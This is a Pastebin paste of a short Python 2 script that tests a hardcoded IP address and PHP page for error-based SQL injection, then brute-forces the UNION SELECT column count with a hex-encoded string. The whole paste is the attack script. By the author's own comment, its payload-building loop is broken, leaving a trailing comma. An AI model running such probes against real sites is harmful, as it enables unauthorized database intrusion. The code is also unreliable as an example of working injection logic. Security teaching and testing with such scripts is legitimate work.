Advertisement
joemccray

quick

Feb 9th, 2017
733
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.12 KB | None | 0 0
  1. #!/usr/bin/env python
  2. print "\n### PHP SQLi Detector ###"
  3. import urllib2,re,sys
  4.  
  5. TARGET = "http://54.172.112.249/acre2.php?lap=acer"
  6.  
  7. SQLi = "'"
  8. SQLiError = "You have an error in your SQL"
  9. myNameInHex = "0x6a6f65"
  10. myName = 'joe'
  11.  
  12. print "==> Testing for SQLi Error Vuln..."
  13. URL = TARGET+SQLi
  14. try:
  15. source = urllib2.urlopen(URL).read() ## WEB REQUEST
  16. except urllib2.URLError, e:
  17. print "$$$ We had an Error\n",e
  18. sys.exit(0)
  19. if re.search(SQLiError,source): ## SEARCH FOR ERROR IN PAGE
  20. print "!! ==> SQLi Found:",TARGET+SQLi
  21. print "## ==> Bruting NULL column...",
  22. URL = TARGET+SQLi+"+UNION+SELECT+" ## BUILD OUR SQLi STATEMENT
  23. for x in xrange(1,8):
  24. if x > 1:
  25. # URL = URL+","
  26. URL = URL+myNameInHex
  27. URL = URL+"," # This comma at the end is breaking it
  28. print x,
  29. try:
  30. source = urllib2.urlopen((URL+"-- +")).read() ## WEB REQUEST
  31. except urllib2.URLError, e:
  32. print "$$$ We had an Error\n",e
  33. sys.exit(0)
  34. if re.search(myName, source): ## SEARCH FOR UNENCODED NULL WORD
  35. print "\n!! ==> Null Column Found:",URL+"--"
  36. break
  37. else:
  38. print "** ==> No SQLi Found!"
  39. print "\nScan Complete\n"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement